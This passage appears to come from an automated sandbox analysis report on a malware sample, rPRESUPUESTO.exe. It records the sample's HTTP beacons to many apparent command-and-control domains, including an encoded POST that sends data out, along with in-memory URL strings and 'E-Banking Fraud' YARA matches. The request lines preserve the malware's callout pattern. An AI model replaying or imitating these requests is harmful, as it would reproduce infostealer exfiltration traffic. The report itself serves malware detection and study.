            Source: global trafficHTTP traffic detected: GET /ndq7/?3hkl=slNhbLXpBjO8vl&4dV43tA=OxZKnWuwsJOrHHhSr0WAKMos2ZEDKwJVMtvq3iaqcpp4OrE8YxBQJzvCfYPSu8gmodsQI/gccX7lRSYJm35OlpLbr+Emqb863it5vTM6q/0fJzxBvxXG8nRUn7++wRvQdA== HTTP/1.1Host: www.tcqlk.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hpa2/?4dV43tA=9ukV0lom1Pkt5UJj/K4lBand6ck4dRKkyq6RFoVD1IbXcSjkOX57QIVSlkgD3OdjwHZgiaAyrGOMfaVTdV8W+y7+gTzt+hDR2BCzfmmCLLxuXIcFaZwChPWJYJEFenE0lA==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.rlplatro.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pyns/?3hkl=slNhbLXpBjO8vl&4dV43tA=K1EGEj+kimjFg9LR9EnSE5iA5qZu36FTtfUVuSlzoP8oPxhtdzERerS5Mp6fVz5Cq8+DdWETSgOpnIOU0gSGOk+1pkQ/H5TXrv7e3gEZftLrUi5jR50/YQGYV+ODUfVL1g== HTTP/1.1Host: www.xsemckm.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vjxp/?4dV43tA=XkwDhAosLmY8qOGkJKM7nBqGXPMJWqSVPKG+tEu7tnkRRA5qaKsxdm3QH0407PDb0a9c/bEAso+GP5FSns/F0pcfHDqX+WZ2QlqXVXtujZTwrVOl6ODb0zZvjrqBrFnJXw==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.b6fbly7u.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gb2c/?3hkl=slNhbLXpBjO8vl&4dV43tA=89eEKNhTAfJ0K+ZNbo8QYk1fUSoEpApn1wnFOcVuW0oI5H3wAhPaJlWMgeBIfmA5pU1pUK0VAPZu7D3VTgjehpZPLbfme/O2eAoCBbtXgeZInoaphOuGkqvoaLKQybRjQA== HTTP/1.1Host: www.quantumvoil.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.transelva.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8urb/?3hkl=slNhbLXpBjO8vl&4dV43tA=+Wbbbk7eLFmMNhAmT0HXUc8arE4mAIhp5z7AS+/8DqhgdhWyAH0zoQfcqO3QhsAMO97HQEWUjr1A2ySQn1zg0/55KGrPENVTP1yAkCUjuBmNS/fntZ3fyi496lnRN2tFRA== HTTP/1.1Host: www.gsdaluan.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /k4dg/?4dV43tA=nz4FHKR3kHD8T7sos5tKkVQRfY182oQFmZOBlJ8PbPlp6eprRQ8g6Bnz+oNd18dyAKSZqsJ9UtPL5lP5nYFy9dCb86j6n0RTbdEdkH9XwmQfMRZVI+dcEtE4XSVBGLRbLA==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.mommysdaycare.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /dy54/?3hkl=slNhbLXpBjO8vl&4dV43tA=nRvBPTzlzGF4n3rt1QttF4nrN+JQ8KTHZyrUcXxxKI8o38P7J7J9FRPNIVc1TZhiGrLUOXxy1Ju1j9DdTlskr3z+VILb9gUTk9d2pc0Ee/hjvnETVBSGl3uD2JlRjMFEvQ== HTTP/1.1Host: www.203av.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vi6c/?4dV43tA=bcf+LDcyoYCm+QyU3/UN8JBlUcMDsPN1iNWsx7umrkQm3W+qfOHyOayxGzxcStXTe9ogwFYflhpGlkCNjFINeirDlZuuOL3Enw+3v27XAzPfiFhmkrPFAnkPRuNZJaNv/Q==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.hydrogenmovie.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e+5nfbuNDjer0F2gZArKywdTCxWjyYobv/bJcL0KsTg4lVUyb9D57z7xFmyHzStdVmhrGKgxJydatVMh3gIVfbA1nNcelGxUr0Cqn1CeETaIIhfK6rSIprtv6DqA0Tv84A== HTTP/1.1Host: www.atmpla.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh73XSapbsD05fysGFvFeXdkAWPx22YjftjyG2q/7RKdCSWXn7wn/qpIWY7LWJ3oR8OZl3TaORuYDQ==&3hkl=slNhbLXpBjO8vl HTTP/1.1Host: www.europedriveguide.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r+ucb4h/g/ZTmy6JwNbO/v5n7k97Wehkk725AqfiRwLRxT17AJTqC5rNKbn4S3nwUKyYsCTiBBHbxywoRNMYnVscP0z+oucLCcHVoXQNraVEZ5jUDUaptob6FA== HTTP/1.1Host: www.coinmao.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: unknownHTTP traffic detected: POST /hpa2/ HTTP/1.1Host: www.rlplatro.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.rlplatro.sbsCache-Control: no-cacheConnection: closeContent-Length: 208Content-Type: application/x-www-form-urlencodedReferer: http://www.rlplatro.sbs/hpa2/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Ascii: 4dV43tA=wsM13RFhpuNB51xUpYYuB4rHo90HS2iq1amMceMKz4v7ehSWQEQtU6tAvQQx1s56+EBpsIMgzVGKbZcKGUYE3FDC9i/q6SDGqCm8JV+kM7ddIZYBdrE2mtPMeb9BVkE+2KmyuT5K4Ut96yaIX2eT60+a2Piqv3lBHogvITH/GtQsExNLDCzzsCa10+PazWByNpcIA/s=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 14:16:06 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 14:16:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 14:16:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 14:16:19 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:05 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 14:17:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 01 Jul 2024 14:17:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 01 Jul 2024 14:17:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 01 Jul 2024 14:17:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 01 Jul 2024 14:17:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:07 GMTConnection: closeContent-Length: 315 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:10 GMTConnection: closeContent-Length: 315 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:12 GMTConnection: closeContent-Length: 315 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:14 GMTConnection: closeContent-Length: 315 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: rPRESUPUESTO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: rPRESUPUESTO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000003EA0000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003E80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gq64q4.cn/user/design/clas/euse/sksueqquqf/81
            Source: rPRESUPUESTO.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: rPRESUPUESTO.exe, 00000000.00000002.2154526498.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ktmutil.exe, 00000009.00000002.4589157081.00000000044E8000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.00000000044C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ww16.atmpla.net/n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e
            Source: ktmutil.exe, 00000009.00000002.4589157081.000000000467A000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.000000000465A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4590404042.00000000055B8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesiestudios.online
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4590404042.00000000055B8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesiestudios.online/s29p/
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://active24.com/cssc/a21/main.less?v=7d8e320747f67055c1a1008fbc40d0c1
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://active24.cz/objednavka/domain/availability/list
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://blog.active24.cz//
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customer.active24.com/
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopy
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/085122-Hosting-a-Servery
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/162807-DNS-hosting?l=cs
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/757409-Bezpe%c4%8dnost
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/806087-Z%c3%a1kladn%c3%ad-informace
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%ad
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNS
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/932337-Spolupr%c3%a1ce
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/939671-Fakturace-a-platby
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Titillium
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/css/landing.css
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/font/active24-icons.eot

            E-Banking Fraud

            Source: Yara match, File source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
